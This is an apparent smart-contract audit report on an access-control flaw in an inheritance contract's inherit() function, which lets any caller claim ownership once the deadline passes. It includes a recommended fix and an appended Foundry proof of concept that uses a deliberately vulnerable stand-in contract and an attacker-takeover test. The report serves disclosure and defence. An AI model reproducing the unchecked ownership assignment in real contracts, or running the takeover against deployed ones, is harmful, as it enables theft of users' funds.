Submission Details
Severity: high
Valid

Unauthorized Ownership Takeover in inherit() Function

Summary

The inherit() function allows any caller to become the new owner when there is exactly one beneficiary and the inactivity deadline has passed. The function never checks that msg.sender is that beneficiary, so an unrelated address can take control of the contract.

Vulnerability Details

    if (beneficiaries.length == 1) {
        owner = msg.sender; // No validation of msg.sender
        _setDeadline();
    }

When beneficiaries.length == 1, the contract blindly assigns msg.sender as the new owner. Nothing ensures that msg.sender is the intended beneficiary (beneficiaries[0]). The only other precondition is that the deadline has passed, so the first address to call inherit() after that point becomes the owner; an attacker does not even need to beat the real beneficiary to it, but if they are watching the mempool they can also front-run the beneficiary's own call. Once owner is reassigned, _setDeadline() restarts the inactivity clock in the attacker's favour.

Impact

• Unauthorized takeover: Any external actor can claim ownership of the contract after the deadline, even if they are not a beneficiary.
• Loss of control: The rightful beneficiary may lose access to the funds or contract functionality.
• Potential fund theft: If the contract manages assets, an attacker could drain them.

Tools Used

Manual review

Recommendations

    function inherit() external {
        if (block.timestamp < getDeadline()) {
            revert InactivityPeriodNotLongEnough();
        }
        if (beneficiaries.length == 1) {
            if (msg.sender != beneficiaries[0]) {
                revert NotAuthorizedBeneficiary();
            }
            owner = msg.sender;
            _setDeadline();
        } else if (beneficiaries.length > 1) {
            isInherited = true;
        } else {
            revert InvalidBeneficiaries();
        }
    }
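The following Foundry proof of concept is added here to show the takeover and confirm the fix; it is not code from the audited project or from the submitter. The audited contract's source is not on this page, so VulnerableInheritance is a constructed stand-in that reproduces only the described inherit() logic (owner, beneficiaries, getDeadline(), _setDeadline(), isInherited and the three errors named above); the contract names, the constructor, and the 90-day TIMELOCK are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Constructed stand-in for the audited contract (assumed shape, not the project's code).
contract VulnerableInheritance {
    error InactivityPeriodNotLongEnough();
    error InvalidBeneficiaries();

    uint256 public constant TIMELOCK = 90 days; // assumed inactivity period
    address public owner;
    address[] public beneficiaries;
    uint256 internal deadline;
    bool public isInherited;

    constructor(address beneficiary) {
        owner = msg.sender;
        beneficiaries.push(beneficiary);
        _setDeadline();
    }

    function getDeadline() public view returns (uint256) {
        return deadline;
    }

    function _setDeadline() internal {
        deadline = block.timestamp + TIMELOCK;
    }

    // Vulnerable version: after the deadline, whoever calls first becomes owner.
    function inherit() external virtual {
        if (block.timestamp < getDeadline()) revert InactivityPeriodNotLongEnough();
        if (beneficiaries.length == 1) {
            owner = msg.sender; // no check that msg.sender == beneficiaries[0]
            _setDeadline();
        } else if (beneficiaries.length > 1) {
            isInherited = true;
        } else {
            revert InvalidBeneficiaries();
        }
    }
}

// Same contract with the recommended check applied.
contract FixedInheritance is VulnerableInheritance {
    error NotAuthorizedBeneficiary();

    constructor(address beneficiary) VulnerableInheritance(beneficiary) {}

    function inherit() external override {
        if (block.timestamp < getDeadline()) revert InactivityPeriodNotLongEnough();
        if (beneficiaries.length == 1) {
            if (msg.sender != beneficiaries[0]) revert NotAuthorizedBeneficiary();
            owner = msg.sender;
            _setDeadline();
        } else if (beneficiaries.length > 1) {
            isInherited = true;
        } else {
            revert InvalidBeneficiaries();
        }
    }
}

contract InheritTakeoverTest is Test {
    address deployer = makeAddr("deployer");
    address heir = makeAddr("heir");
    address attacker = makeAddr("attacker");

    function test_attackerTakesOwnershipOnVulnerable() public {
        vm.prank(deployer);
        VulnerableInheritance c = new VulnerableInheritance(heir);

        // Before the deadline the call is correctly rejected.
        vm.prank(attacker);
        vm.expectRevert(VulnerableInheritance.InactivityPeriodNotLongEnough.selector);
        c.inherit();

        // Once the owner has been inactive past the deadline, a stranger wins.
        vm.warp(block.timestamp + c.TIMELOCK() + 1);
        vm.prank(attacker);
        c.inherit();
        assertEq(c.owner(), attacker);
        assertGt(c.getDeadline(), block.timestamp); // clock restarted for the attacker
    }

    function test_fixRejectsNonBeneficiary() public {
        vm.prank(deployer);
        FixedInheritance c = new FixedInheritance(heir);
        vm.warp(block.timestamp + c.TIMELOCK() + 1);

        vm.prank(attacker);
        vm.expectRevert(FixedInheritance.NotAuthorizedBeneficiary.selector);
        c.inherit();
        assertEq(c.owner(), deployer);

        vm.prank(heir);
        c.inherit();
        assertEq(c.owner(), heir);
    }
}
```

Run with forge test --match-contract InheritTakeoverTest. The first test passes only because the vulnerable branch exists; with the check in place the attacker's call reverts with NotAuthorizedBeneficiary while the real beneficiary still inherits normally.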
Updates

Lead Judging Commences

0xtimefliez Lead Judge 9 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Inherit depends on msg.sender so anyone can claim the contract
